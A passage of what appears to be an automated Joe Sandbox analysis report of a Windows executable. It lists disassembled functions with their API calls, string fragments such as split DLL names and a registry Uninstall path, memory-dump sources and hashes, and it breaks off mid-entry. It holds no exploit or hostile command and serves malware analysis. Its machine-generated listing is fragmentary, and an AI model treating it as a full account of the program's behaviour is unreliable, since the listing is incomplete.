                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                            • Part of subcall function 0046BB40: GetProcAddress.KERNEL32(?,?), ref: 0046BB78
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandle$AddressEnterInit_thread_footerInitializeLeaveObjectProcSingleWait_strrchr
                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                          • API String ID: 1861692331-2746444292
                                                                                                                                                                                                          • Opcode ID: c0519f0561d1263de137dad28d34114e192e9bb1ddd60408e0866fa429f1522f
                                                                                                                                                                                                          • Instruction ID: 2042a746c37683b5fe93729a1af4a6326984fea1b396c7364fbc35c38a601fa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0519f0561d1263de137dad28d34114e192e9bb1ddd60408e0866fa429f1522f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96A10AB1E0020C5ADF209A209C45BEF7768AB51309F5446DFFD0A97242E739DED8CB5A
                                                                                                                                                                                                          Function 004160B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00401330: GetProcessHeap.KERNEL32 ref: 0040139A
                                                                                                                                                                                                            • Part of subcall function 00401330: __Init_thread_footer.LIBCMT ref: 004013CC
                                                                                                                                                                                                            • Part of subcall function 00401330: __Init_thread_footer.LIBCMT ref: 00401457
                                                                                                                                                                                                            • Part of subcall function 005136D8: RtlEnterCriticalSection.NTDLL(00596DF8), ref: 005136E3
                                                                                                                                                                                                            • Part of subcall function 005136D8: RtlLeaveCriticalSection.NTDLL(00596DF8), ref: 0051370F
                                                                                                                                                                                                          • FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000), ref: 0041613D
                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,00000006,00000006), ref: 00416189
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFindInit_thread_footerResourceSection$EnterHeapLeaveProcess
                                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$mY$mY
                                                                                                                                                                                                          • API String ID: 3785588035-1709015650
                                                                                                                                                                                                          • Opcode ID: 5a2f1d6ba2502c82c6f869b35698a59d3d0892a62e3169168e37d918391b1c5f
                                                                                                                                                                                                          • Instruction ID: 270e102bd065b118de348aa4f1063a528aec08687396fef78cbaffba3b9d4602
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2f1d6ba2502c82c6f869b35698a59d3d0892a62e3169168e37d918391b1c5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C411671B00520ABD714ABA9DC45BBF76E4EF84714F01416EF806DB381DB38DD419BA9
                                                                                                                                                                                                          Function 0048E3D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 105libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProc
                                                                                                                                                                                                          • String ID: \Global.db$\PHX\DT$\PHX\DU$erPa
                                                                                                                                                                                                          • API String ID: 3908199253-2618851521
                                                                                                                                                                                                          • Opcode ID: fb2f0a007127aa59ba6e9c80fa2dee8f4970b50855c1a864e8e1cc14d9be671a
                                                                                                                                                                                                          • Instruction ID: 22bd3ae536f36315dd3df5167b6fc734e0aae32db2466f701b3d24d96dad6565
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2f0a007127aa59ba6e9c80fa2dee8f4970b50855c1a864e8e1cc14d9be671a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B31C671B00208AFDB14EF95C955BEEBBB4FB48704F00056EF409A72C1DB789A44CBA9
                                                                                                                                                                                                          Function 0046C0E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00809318), ref: 0046C149
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046C166
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: .dll$iphl$papi
                                                                                                                                                                                                          • API String ID: 2574300362-3203080450
                                                                                                                                                                                                          • Opcode ID: ed094ef179a710b71aacfa941f0bec4ed73de9946578c154e8a21e69b724d243
                                                                                                                                                                                                          • Instruction ID: 8f22f3a2ea63b0015d9947428c80e2858e96284ac2e6a20a641d7bb55d587829
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed094ef179a710b71aacfa941f0bec4ed73de9946578c154e8a21e69b724d243
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C116DB1904619DFDB10CF98D955BEEBBF8FB08704F10821EE415A7650EB749644CB90
                                                                                                                                                                                                          Function 0052E2D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0052E284,00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002), ref: 0052E2F3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0052E306
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0052E284,00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000), ref: 0052E329
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                          • Opcode ID: b53ac596755930d52a6fadaac9d62fa639fc5f029d460c5187e126a61092a100
                                                                                                                                                                                                          • Instruction ID: 34cf3210dd55c905d628812567bb2e8a1e3267d31045eddd7af0ad4527f2ccef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b53ac596755930d52a6fadaac9d62fa639fc5f029d460c5187e126a61092a100
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F03138A00118BBCB159B95DC09BDEBFA8FF59716F014168F805A61A0DB749E45DB90
                                                                                                                                                                                                          Function 004321F0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 307COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ?p$reschk$resmd$setres
                                                                                                                                                                                                          • API String ID: 0-1727112364
                                                                                                                                                                                                          • Opcode ID: 48672ed122b0bddd77802af3c119839ac589ff094414b07231c4035a80841895
                                                                                                                                                                                                          • Instruction ID: b6887b571b79c76cb28713bcc6fd15bb5ca461b69fd2106e21546973d5c59f29
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48672ed122b0bddd77802af3c119839ac589ff094414b07231c4035a80841895
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C1F7709002189BEF24DF78CE597DEBBB2EF45304F10859DD409AB292DBB95A84CF94
                                                                                                                                                                                                          Function 00480010 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Mpunctshared_ptr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3707918647-0
                                                                                                                                                                                                          • Opcode ID: 601647dedc0e83b46b017e71f2f6c13c673d6cdc09bc1aebfcd4b4d2f6811210
                                                                                                                                                                                                          • Instruction ID: 4703a93ca3bd832a26a3e965ba87b43e346b3b553fa57dd4b036ba99fe8237c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 601647dedc0e83b46b017e71f2f6c13c673d6cdc09bc1aebfcd4b4d2f6811210
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD7140719002089FCB14EF99DC51AEEBBB4BF48314F00852EF919AB292DB34AD45CF94
                                                                                                                                                                                                          Function 004380C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 339COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Rar$http$https
                                                                                                                                                                                                          • API String ID: 0-4117486229
                                                                                                                                                                                                          • Opcode ID: 255565b93451528d23ec41ae5f6bf0822215824fc7c09c239e6dc08b13a5c307
                                                                                                                                                                                                          • Instruction ID: c01b96a2c8d596e19198a45bce2ee704d57ce5b15ad785e0aa1ae4eebdbe892f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 255565b93451528d23ec41ae5f6bf0822215824fc7c09c239e6dc08b13a5c307
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECD17771900709AADF11DF60CC85FEBB7BDBB48304F04447EFA49AB181EB7996858B64
                                                                                                                                                                                                          Function 0046C210 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 0046C79D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID: .dll$el32$kern
                                                                                                                                                                                                          • API String ID: 4139908857-1222553051
                                                                                                                                                                                                          • Opcode ID: 53f38229f50880b1b653f986198bb602e07a5350933c01f6b1930548bb1454ba
                                                                                                                                                                                                          • Instruction ID: b9de17128df73029d24797684e8ef86495bbb94d637a75dc8c5a48db0e3826a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f38229f50880b1b653f986198bb602e07a5350933c01f6b1930548bb1454ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77C1BDB0046B458FE3618F62C5AD7C7BBE0BB05708F108A0CC5EA1A691C7BA6148CFD5
                                                                                                                                                                                                          Function 0046E3F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole3,?), ref: 0046E491
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID: 2.dl$l$ole3
                                                                                                                                                                                                          • API String ID: 4139908857-965305729
                                                                                                                                                                                                          • Opcode ID: 7ef31d3b7f8581d3f5aadb8365892335739c6bfbdbf294003ced9e53ee97cd10
                                                                                                                                                                                                          • Instruction ID: 8f2bf91bf3d2448bd789ce78fb5efe9d13357ca76df204067599bd65d04d3c40
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ef31d3b7f8581d3f5aadb8365892335739c6bfbdbf294003ced9e53ee97cd10
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A411D9B0401B08CFE320CF55C56835BBBF4FB08708F409A5CD49A5BB80D7BAAA088F84
                                                                                                                                                                                                          Function 00456260 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597F80), ref: 004562CE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004562EA
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00456305
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597F80), ref: 004564B8
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: 0a37b37312c0aad0674c2d2167d0b8a09b0a71af4ce73e95722668c8892f0a82
                                                                                                                                                                                                          • Instruction ID: 153ca7a3c2cfea5ed95ec46b7b976fee5050ccb7cc731806f3dea98a796c13f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a37b37312c0aad0674c2d2167d0b8a09b0a71af4ce73e95722668c8892f0a82
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A76158B0805B85CFD761CF68C5057CABFF0BB19304F1089AED0AA97782D7B96648DB91
                                                                                                                                                                                                          Function 00538129 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00520705,?,00000000,00000000,00000001,00000000,?,00000001,00520705,00000003), ref: 00538176
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005381FF
                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0051F4B6,?), ref: 00538211
                                                                                                                                                                                                          • __freea.LIBCMT ref: 0053821A
                                                                                                                                                                                                            • Part of subcall function 00534B51: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                                          • Opcode ID: 0739b6d3b0aa51662c7102ee3fdea465fbdbfead664a83b5fbe3e6ab306feee7
                                                                                                                                                                                                          • Instruction ID: 68c0ed9caf9be31bee086ba84f96ee76031a3cc1e3c90aa238bd672ad312f9f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0739b6d3b0aa51662c7102ee3fdea465fbdbfead664a83b5fbe3e6ab306feee7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31A936A0020AABDB288F65DC89DFF7FA5EB40310F154129FC0597250EB35DD95CBA0
                                                                                                                                                                                                          Function 00446140 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597D88), ref: 004461AF
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004461CB
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597D88), ref: 004461E6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597D88), ref: 0044627D
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
